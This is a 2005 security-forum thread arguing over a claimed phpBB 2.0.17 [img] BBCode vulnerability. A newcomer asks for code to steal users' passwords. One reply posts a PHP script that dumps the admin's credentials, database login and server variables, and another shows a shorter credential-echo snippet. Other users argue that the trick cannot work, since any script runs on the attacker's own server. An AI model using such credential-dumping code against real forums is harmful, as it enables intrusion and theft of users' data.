|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
phpBB 2.0.17 and most likely below |
|
Posted: Wed Aug 10, 2005 8:06 pm |
|
|
darkclaw |
Regular user |
|
|
Joined: Aug 04, 2005 |
Posts: 14 |
|
|
|
|
|
|
|
PhpBB - [img][/img] vulnerability
Affected: phpBB 2.0.17 and most likely below.
Discovered by: Easyex.
Create a folder on a remote host like 'exploit.jpg' and then we would put the following in our signature:
Code: | [img]http://theremotehost.com/exploit.jpg[/img] |
Inside the exploit.jpg folder we would have index.php or index.html with malicious code. |
|
|
|
|
Posted: Thu Aug 11, 2005 1:12 am |
|
|
zer0-c00l |
Advanced user |
|
|
Joined: Jun 25, 2004 |
Posts: 72 |
Location: BRAZIL! |
|
|
|
|
|
|
any examples of the malicious html code? |
|
|
|
|
Posted: Thu Aug 11, 2005 10:17 am |
|
|
Tomanas |
Active user |
|
|
Joined: Jan 30, 2005 |
Posts: 29 |
|
|
|
|
|
|
|
yeah, i would be interesting what kind of malicious code you can insert
----edit:
well i tried to insert this script:
<?
echo 'HOST: '.$dbhost.'<BR>dbNm: '.$dbname.'<BR>USER: '.$dbuser.'<BR>PASS: '.$dbpasswd.'<BR>TABLE PREFIX: '.$table_prefix;
?>
But nothing happened.....one more question, from where did you got this vuln ?
----edit 2:
man, you made a "little" mistake, Easyex found a bbcode img vuln *NOT* in the phpBB, but *IN* the php fusion.......shit, man, you made me laugh...
Here's the poc: http://www.milw0rm.com/id.php?id=1135 |
|
|
|
|
|
|
|
|
Posted: Thu Aug 11, 2005 2:43 pm |
|
|
darkclaw |
Regular user |
|
|
Joined: Aug 04, 2005 |
Posts: 14 |
|
|
|
|
|
|
|
Tomanas wrote: | yeah, i would be interesting what kind of malicious code you can insert
----edit:
well i tried to insert this script:
<?
echo 'HOST: '.$dbhost.'<BR>dbNm: '.$dbname.'<BR>USER: '.$dbuser.'<BR>PASS: '.$dbpasswd.'<BR>TABLE PREFIX: '.$table_prefix;
?>
But nothing happened.....one more question, from where did you got this vuln ?
----edit 2:
man, you made a "little" mistake, Easyex found a bbcode img vuln *NOT* in the phpBB, but *IN* the php fusion.......shit, man, you made me laugh...
Here's the poc: http://www.milw0rm.com/id.php?id=1135 |
If you don't know what you're saying then please shut up:
http://dark-assassins.com/forum/viewtopic.php?t=248 |
|
|
|
|
Posted: Thu Aug 11, 2005 6:36 pm |
|
|
Tomanas |
Active user |
|
|
Joined: Jan 30, 2005 |
Posts: 29 |
|
|
|
|
|
|
|
no hard feelings nigga ;-] when i googled, at first i found that it's a php-fusion exploit, so nevermind |
|
|
|
|
|
|
|
|
Posted: Sat Aug 13, 2005 12:09 am |
|
|
LordLucan |
Beginner |
|
|
Joined: Aug 13, 2005 |
Posts: 1 |
|
|
|
|
|
|
|
I need a little help here as I am new to php. Does this just run the html or php file in the browsers of the people using the forum or can the index.php file be used to interact with the forum database?
If the index.php file can interact with the database could someone post an example of some code that could be saved as index.php that would allow me to do this? For example to extract users passwords.
Sorry if this sounds like a typical newbies "teach me to hack" question but I would appreciate anyone helping me to learn.
If it just runs the file in the users browser what sort of code could be used? Would it just be something like using IE Exploiter code to download trojans on to the users machines or what?
Much thanks to anyone who can hellp me learn |
|
|
|
|
|
|
|
|
Posted: Sat Aug 13, 2005 10:51 pm |
|
|
shai-tan |
Valuable expert |
|
|
Joined: Feb 22, 2005 |
Posts: 477 |
|
|
|
|
|
|
|
Wow this is the most confussing post.... Well I dont care so if I added something along the lines of this perhaps
Code: | <?php
define('IN_PHPBB', true);
$phpbb_root_path = '';
include($phpbb_root_path . '/extension.inc');
include($phpbb_root_path . '/db/mysql.'.$phpEx);
include($phpbb_root_path . '/common.'.$phpEx);
?>
<b><h2>Do Not Worry About the Errors Above. The Information you Want is below :)</h2></b>
<h4>
Admin Forum Information: </h4>
<?php
$uid = '2';
$sql = "SELECT user_id, username, user_password, user_email
FROM ". USERS_TABLE ."
WHERE user_id = $uid";
if ( !($result = $db->sql_query($sql)) )
{
message_die(GENERAL_ERROR, 'Error in obtaining userdata', '', __LINE__, __FILE__, $sql);
}
echo "<table>\n";
while ($line = mysql_fetch_array($result, MYSQL_ASSOC))
{
echo "\t<tr>\n";
foreach ($line as $col_value)
{
echo "\t\t<td> $col_value </td>\n";
}
echo "\t<tr>\n";
}
echo "</table>\n";
?>
<h4>
Database Information:<br/></h4>
Database Type = <?php echo $dbms;?><br/>
DB Host = <?php echo $dbhost;?><br/>
DB Name = <?php echo $dbname;?><br/>
DB User = <?php echo $dbuser;?><br/>
DB Password = <?php echo $dbpasswd;?><br/>
DB Table Prefix = <?php echo $table_prefix;?><br/>
<p>
<p>
<?php print "Document root is ".$_SERVER["DOCUMENT_ROOT"]."<br />";
print "This page is called ".$_SERVER["PHP_SELF"]; ?>
<p>
<p>
<p>
<p>
<h4>And here is a load of useful info</h4></p>
<?php
print_r($_SERVER);
?>
<p>
<p>
<?php
print $_SERVER[""];#Built in Variable name
?> |
into a file called index.php in http://remotehost.com/hello.jpg/ directory then linked the dir to my avatar it might work or it does work? (Im Away from my local testing station) |
|
_________________ Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
|
|
XSS |
|
Posted: Sun Aug 14, 2005 9:03 am |
|
|
beford |
Beginner |
|
|
Joined: Aug 01, 2005 |
Posts: 2 |
|
|
|
|
|
|
|
i havn't tested this, but i dont think that it will allow any server side php execution. I guess that it's only for XSS. (steal cookies) |
|
|
|
|
Posted: Sun Aug 14, 2005 8:52 pm |
|
|
Tomanas |
Active user |
|
|
Joined: Jan 30, 2005 |
Posts: 29 |
|
|
|
|
|
|
|
yeah, as i was talking to this bug's founder, he said, that it's impossible to get info from let a say config.php.....so i think it's just ant xss bug....well, lets wait for a genius, who will write something useful.... |
|
|
|
|
|
|
|
|
Posted: Wed Aug 17, 2005 3:02 pm |
|
|
lunix |
Regular user |
|
|
Joined: Aug 17, 2005 |
Posts: 16 |
|
|
|
|
|
|
|
This is silly. Its obvious that it has no potential at all.
The person who claims they "discovered an exploit" needs a slap
From reading the posts it looks like you people dont even know HTML.
By putting a url between [bbcode] you are simulating html.
The scripts will then replace [img] with <img src=" and [/img] with ">
This means the browser is expecting an image and will treat the data it recieves as an image. It will not include any php, it will not render html, it will not execute javascript. It will only display an image.
The only way this would work is if you use a php script that produces an image (GD library), and that has no potential for an exploit either.
The complete lack of any POC makes me think the the person who claimed to have discovered an exploit knows absolutly nothing.
now, Think about it.
Damn skiddies.... people dont even think any more.
thanks. |
|
|
|
|
|
|
|
|
Posted: Thu Aug 18, 2005 6:26 am |
|
|
shai-tan |
Valuable expert |
|
|
Joined: Feb 22, 2005 |
Posts: 477 |
|
|
|
|
|
|
|
We are not all script kiddies here mate |
|
_________________ Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
Posted: Fri Aug 19, 2005 10:51 am |
|
|
Easyex |
Regular user |
|
|
Joined: Aug 19, 2005 |
Posts: 6 |
|
|
|
|
|
|
|
Obviously you don't know what your talking about.
It wont run a php script will it? Ahh yes that's why i have already showed proof to PhpBB's support team (NeoThermic) and they came up with even more ways to fake an image and enter data via a php file and execute it so.. yeah think again before you speak.
NeoThermic from PhpBB confirmed the vuln, but you wont be able to gain access it simply loads the php script file from a remote server.. (you can get the header to send to a logout, and do other pointless stuff)
Regards,
Easyex. |
|
|
|
|
|
|
|
|
Posted: Fri Aug 19, 2005 4:30 pm |
|
|
lunix |
Regular user |
|
|
Joined: Aug 17, 2005 |
Posts: 16 |
|
|
|
|
|
|
|
The PHP will NOT be run on the server you are trying to exploit.
It will be run on YOUR server. so there is no XSS possability.
Then the image headers are sent to the browsers and an image is downloaded.
OMFG!! AN IMAGE!! 1337!!!
post the POC if yor so sure its an exploit. Seems so be a lot of guff and no substance.
People have been using php images for years.
The script is NOT being run on in target server, its run in your server.
The script is NOT included in the page on the remote server, an image is downloaded client side. This has no more potential that an ordinary png image.
BTW.
if it is an exploit or flaw (which is ins't) then it will be impossible to patch it without banning images completely. |
|
|
|
|
|
|
|
|
Posted: Fri Aug 19, 2005 4:50 pm |
|
|
Easyex |
Regular user |
|
|
Joined: Aug 19, 2005 |
Posts: 6 |
|
|
|
|
|
|
|
Go talk to NeoThermic from PhpBB and then find out.
No it does not execute on the PhpBB server.
It executes once the page is loaded, It wont show javascript, it wont show the php script it will only execute what ever is inside it.
And i'll say it again go get in contact with NeoThermic from PhpBB's support team and he will tell you the same thing i have.
You cant gain access to PhpBB but you can still do certian things with it.
We already tested this and PhpBB confirmed it, Would PhpBB confirm it if it didn't work? ...
So shut up already you fool. |
|
|
|
|
|
|
|
|
Posted: Fri Aug 19, 2005 5:01 pm |
|
|
lunix |
Regular user |
|
|
Joined: Aug 17, 2005 |
Posts: 16 |
|
|
|
|
|
|
|
post a proof of concept code then if your so confident this will have an effect.
we tried every possability 18 months ago, nothing would work.
Because you are using img tags it only has the ability to display an image, so image headers are sent. That means the browser will only treat what it recieves as an image. nothing executes client side or server side.
Only the script on your server will run, and it can only output an image.
If this has any chance of working then ALL images would work, not just gd library.
By using a folder called image.gif and putting the script in it as index.php you are simulating the mod_rewrite function of linux servers.
Nothing more.
so, lets see some proof of concept. |
|
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 5
Goto page 1, 2, 3, 4, 5Next
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|